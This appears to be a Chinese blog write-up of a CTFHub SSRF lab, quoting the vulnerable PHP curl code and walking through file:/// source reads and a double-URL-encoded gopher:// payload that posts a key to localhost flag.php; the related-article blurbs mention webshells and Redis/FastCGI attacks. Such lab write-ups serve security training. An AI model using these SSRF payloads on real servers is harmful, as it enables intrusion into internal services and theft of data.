ctfhub-web-ssrf-POST请求

已于 2024-08-29 09:57:59 修改
阅读量898 收藏 13
点赞数 7
分类专栏: ctf 文章标签: 前端
于 2024-08-29 09:57:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52484587/article/details/141668732
版权

这次是发一个HTTP POST请求.对了.ssrf是用php的curl实现的.并且会跟踪302跳转.加油吧骚年

定义:Gopher是Internet上一个非常有名的信息查找系统,它将Internet上的文件组织成某种索引,很方便地将用户从Internet的一处带到另一处。在WWW出现之前,Gopher是Internet上最主要的信息检索工具,Gopher站点也是最主要的站点,使用tcp70端口。但在WWW出现后,Gopher失去了昔日的辉煌。现在它基本过时,人们很少再使用它;

    gopher协议支持发出GET、POST请求:可以先截获get请求包和post请求包,在构成符合gopher协议的请求。gopher协议是ssrf利用中最强大的协议

我们访问 127.0.0.1/flag.php 会得到一个输入框

查看源码得到 key=d5d8717016de3b11b8498de1fe572509

输入输入框:

我们尝试通过file协议读取index.php 和flag.php的页面源码

?url=file:///var/www/html/index.php
?url=file:///var/www/html/flag.php 

<?php

error_reporting(0);

if (!isset($_REQUEST['url'])){
    header("Location: /?url=_");
//如果url参数不存在,这行代码将使用HTTP头信息来重定向用户到根目录,并且尝试访问一个URL参数为_的页面
    exit;
}

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_REQUEST['url']);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_exec($ch);
curl_close($ch);
$ch = curl_init();:初始化cURL会话。
curl_setopt($ch, CURLOPT_URL, $_REQUEST['url']);:设置cURL选项,指定要访问的URL,这个URL是从请求参数中获取的。
curl_setopt($ch, CURLOPT_HEADER, 0);:设置cURL选项,告诉cURL不返回HTTP头。
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);:设置cURL选项,允许cURL跟随重定向。
curl_exec($ch);:执行cURL会话。
curl_close($ch);:关闭cURL会话。

if ($_SERVER["REMOTE_ADDR"] != "127.0.0.1") {:这行代码检查发起请求的IP地址是否是本地地址(127.0.0.1)。如果不是,脚本将执行if语句内的代码。

echo "Just View From 127.0.0.1";:如果请求的IP不是本地地址,脚本将输出一条消息,提示只能从本地地址访问。

return;:这行代码结束脚本的执行。

$flag=getenv("CTFHUB");:这行代码尝试从环境变量中获取名为CTFHUB的值,并将其存储在变量$flag中。

$key = md5($flag);:然后,脚本计算$flag的MD5哈希值,并将结果存储在变量$key中。

if (isset($_POST["key"]) && $_POST["key"] == $key) {:这行代码检查是否通过POST方法提交了名为key的参数,并且该参数的值是否与$key变量的值相等。

echo $flag;:如果条件满足,脚本将输出存储在$flag变量中的值。

<?php

error_reporting(0);

if ($_SERVER["REMOTE_ADDR"] != "127.0.0.1") {
    echo "Just View From 127.0.0.1";
    return;
}

$flag=getenv("CTFHUB");
$key = md5($flag);

if (isset($_POST["key"]) && $_POST["key"] == $key) {
    echo $flag;
    exit;
}
?>

尝试使用 Gopher 协议向服务器发送 POST 包
首先构造 Gopher协议所需的 POST请求:

POST /flag.php HTTP/1.1
Host: 127.0.0.1:80
Content-Length: 36
Content-Type: application/x-www-form-urlencoded
 
key=d5d8717016de3b11b8498de1fe572509

 在使用 Gopher协议发送 POST请求包时,Host、Content-Type和Content-Length请求头是必不可少的,但在 GET请求中可以没有。 key值为自己所获得的。

        在向服务器发送请求时,首先浏览器会进行一次 URL解码,其次服务器收到请求后,在执行curl功能时,进行第二次 URL解码。

所以我们需要对构造的请求包进行两次 URL编码:

POST+%2fflag.php+HTTP%2f1.1%0aHost%3a+127.0.0.1%3a80%0aContent-Length%3a+36%0aContent-Type%3a+application%2fx-www-form-urlencoded%0a+%0akey%3dd5d8717016de3b11b8498de1fe572509

POST+%2fflag.php+HTTP%252f1.1%250d%250aHost%253a+127.0.0.1%253a80%250d%250aContent-Length%253a+36%250d%250aContent-Type%253a+application%252fx-www-form-urlencoded%250d%250a%250d%250akey%253dd5d8717016de3b11b8498de1fe572509

 因为flag.php中的$_SERVER["REMOTE_ADDR"]无法绕过,只能通过index.php页面中的curl功能向目标发送 POST请求,构造如下Payload:

view-source:http://challenge-4a31b39b2d878282.sandbox.ctfhub.com:10800/?url=gopher://127.0.0.1:80/_POST+%2fflag.php+HTTP%252f1.1%250d%250aHost%253a+127.0.0.1%253a80%250d%250aContent-Length%253a+36%250d%250aContent-Type%253a+application%252fx-www-form-urlencoded%250d%250a%250d%250akey%253dd5d8717016de3b11b8498de1fe572509

发送POST请求,得到flag。 

oliveira-time
关注
专栏目录
CTFHubWEBSSRF(前四关)--内网访问、伪协议读取文件、端口扫描、post请求
weixin_57240513的博客
07-24 361
配置好后开始攻击,根据长度不同查看到端口为8965端口已经查出但是请求错误,怀疑是dirt://不可用然后改成http://后,成功拿到。
CTFHub技能树 Web-SSRF POST请求
Senimo
07-02 2984
POST请求 hint:这次是发一个HTTP POST请求,对了,ssrf是用php的curl实现的,并且会跟踪302跳转,加油吧骚年。 启动环境,访问页面为空白,查看URL: http://challenge-d01ce204edb10174.sandbox.ctfhub.com:10800/?url=_ 通过 GET 传参直接拼接上127.0.0.1/flag.php,访问后得到一个输入框: 查看源码: <form action="/flag.php" method="post"> &l
CTFHub-Web-SSRF
IceCream的博客
04-29 1974
1.题目提示说访问127.0.0.1的flag.php,在URL后面添加路径没想到直接访问成功。
CTFHub----WEB-SSRF全网最详细的保姆级教程!!!!!!
2401_85783544的博客
07-24 1137
1.我们直接访问flag.php发现没有提交按钮,所以我们需要自己写一个按钮,前端的东西还是很容易修改 的, 把这个标签直接插入到下列html中去。2.在这里我们用的是第一个 file:///,去访问本地计算机中的文件,访问成功后看见有三个问号。file:///-------- 本地文件传输协议,主要用于访问本地计算机中的文件。3.,我们可以使用localhost来代替,也是本机的意思.成功获得flag。
ctfhub-web-ssrf-post请求 解题思路(gopher伪协议应用)
2301_80307383的博客
07-23 662
但是使用bp的url编码得不到本题flag,只有用脚本的url编码才能得到flag(不理解,望有高人指点)1.打开题目首先输入url=127.0.0.1/flag.php进行测试,查看源码后发现给出一个key值。构造gopher伪协议,使得在index页面提交带key的post请求以得到flag,注意换行符。将key值输入该页面给出的输入框后,提示只能从127.0.0.1进行访问。2.接着访问flag.php,index.php的源代码。在cmd里运行,位置自选,我的在桌面。构造好之后放入bp编码。
CTFHub-技能树-Web-SSRF
MCTSOG的博客
04-18 1086
CTFHub技能树-web-ssrf
CTFHub-Web-SSRF解题过程
2401_86440467的博客
08-10 1851
开启环境访问后,url=后添加如下,得到flag。
CTFHub--web--ssrf
2302_77944815的博客
08-27 293
编码后把%0A替换为%0d%0A 并在数据后再加一个%0d%0A。编码后把%0A替换为%0d%0A 并在数据后再加一个%0d%0A。把POST前面的数据改为正常数据,得到flag。新建个php文件里面输入一句话木马。把POST前面的数据改为正常数据。在网页的控制台上添加一个提交按钮。在POST前添加gopher函数。设置payload类型和范围。得到的数据进行url编码。把得到的数据进行二次编码。打开源代码获得key。添加gopher函数。把数据进行url编码。
CTFHUB--SSRF详解
qq_49422880的博客
05-23 6830
SSRF详解SSRF漏洞介绍一、(内网访问、伪协议利用)1.1内网访问1.2伪协议读取文件1.3端口扫描二、(POST 上传文件 FastCGI协议 Redis协议)2.1 POST请求2.2 上传文件2.3 FastCGI协议2.4 Redis协议三、(Bypass系列)3.1 URL Bypass3.2 数字IP Bypass3.3 302跳转 Bypass3.4 DNS重绑定 Bypass SSRF漏洞介绍    SSRT(Server-Side Request Forgery,服务器端请求伪造),就
CTFHUB-WEB-SSRF【11】POST请求 上传文件 FastCGI协议 Redis协议
(∪.∪ )...zzz的博客
06-13 976
!!!POST请求试一下`?url=file:///var/www/html/flag.php`根据提示从127.0.0.1 访问给服务器发送一个KEY,写POST包上传文件FastCGI协议Redis协议 POST请求 试一下?url=file:///var/www/html/flag.php 根据提示从127.0.0.1 访问 给服务器发送一个KEY,写POST包 <!-- Debug: key=a977f452523073d3d7d2fd8bd41b5331--> 这个是基础po
CTFhub-ssrf-POST请求
qq_51553814的博客
08-11 3993
CTFhub-ssrf-POST请求 解题 进入靶场,首先看到的是一片空白,没有任何返回,甚至看源码里面也没有任何东西 使用dirsearch扫描,扫出了一个文件/index.php 还有一个flag.php,我是在网上看WP才知道有这个文件,看了很多篇WP都没有说这个文件怎么来的,只是直接说发现了这个文件 现在先来看一看这两个文件吧 首先是flag.php文件,我们让url=127.0.0.1/flag.php,通过内网来访问就能直接访问到了,访问后是一个方框 再看源码发现,需要用post传输一个key
CTFHUB-web-SSRF
ookami6497的博客
03-25 887
CTFHUB-web-ssrf
CTFHUB-SSRF-POST请求
qq_62078839的博客
04-23 1675
打开连接 尝试读取flag.php与index.php flag.php <?php error_reporting(0); if ($_SERVER["REMOTE_ADDR"] != "127.0.0.1") { echo "Just View From 127.0.0.1"; return; } $flag=getenv("CTFHUB"); $key = md5($flag); if (isset($_POST["key"]) && $_P...
CTFHUB-技能树-WEB通关
Alita_lxz的博客
11-11 7239
Web 题目来自ctfhub技能树web部分 Web前置技能 操作系统 数据库 HTTP协议 请求方式 HTTP 请求方法, HTTP/1.1协议中共定义了八种方法(也叫动作)来以不同方式操作指定的资源。 ​ 1.OPTIONS   返回服务器针对特定资源所支持的HTTP请求方法。也可以利用向Web服务器发送’*'的请求来测试服务器的功能性,如获取当前URL所支持的方法。若请求成功,则它会在HTTP头中包含一个名为“Allow”的头,值是所支持的方法,如“GET,POST”。  2.HEAD   向服务
前端的全栈混合之路Meteor篇:3.0新版本介绍
分享有趣的、贴近生活的CS知识
10-01 1132
Meteor全栈框架3.0版本终于稳定下来了,它的效果约等于webpack+vue+express+socket.io+mongodb+npm+uniapp,学一个搞定全套,值得学习了解下,最后找到适合于自己的技术栈。
Javascript数组研究03_手写实现_fill_filter_find_findIndex_findLast_findLastIndex
qq_33546823的博客
10-03 1223
fill()方法用一个固定值填充一个数组中从起始索引(默认为 0)到终止索引(默认为)内的全部元素。它返回修改后的数组。输入参数value:用来填充数组元素的值。start(可选):开始填充的位置,默认值为 0,索引处理方法和copyWithin一致。end(可选):停止填充的位置(不包含该位置),默认值为,索引处理方法和copyWithin方法一致。输出:修改后的原数组。注意事项该方法会改变原数组,是修改方法。对于稀疏数组,空槽也会被value填充。是通用的方法在空数组上不会有任何处理。
Vue根实例、实例总结
最新发布
m0_54007573的博客
10-04 517
Vue根实例、实例总结
CTFHub ssrf
07-29
CTFHub是一个CTF(Capture The Flag)比赛平台,提供了各种安全挑战和漏洞利用的题目。在引用\[1\]中提到了一些与SSRF(Server-Side Request Forgery)相关的内容,包括伪协议读取文件、端口扫描、POST请求上传文件、FastCGI、Redis协议、URL Bypass、数字IP Bypass、302跳转Bypass和DNS重绑定 Bypass。引用\[2\]中提到了CGI和FastCGI协议的运行原理,并介绍了使用Gopherus工具生成攻击FastCGI的payload。引用\[3\]中提到了一个使用Python脚本进行端口扫描的例子。 所以,CTFHub ssrf是指在CTFHub平台上与SSRF相关的内容和挑战。 #### 引用[.reference_title] - *1* [CTFHubSSRF](https://blog.csdn.net/qq_45927819/article/details/123400074)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [CTFHUB--SSRF详解](https://blog.csdn.net/qq_49422880/article/details/117166929)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [CTFHub技能树笔记之SSRF:内网访问、伪协议读取文件、端口扫描](https://blog.csdn.net/weixin_48799157/article/details/123886077)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值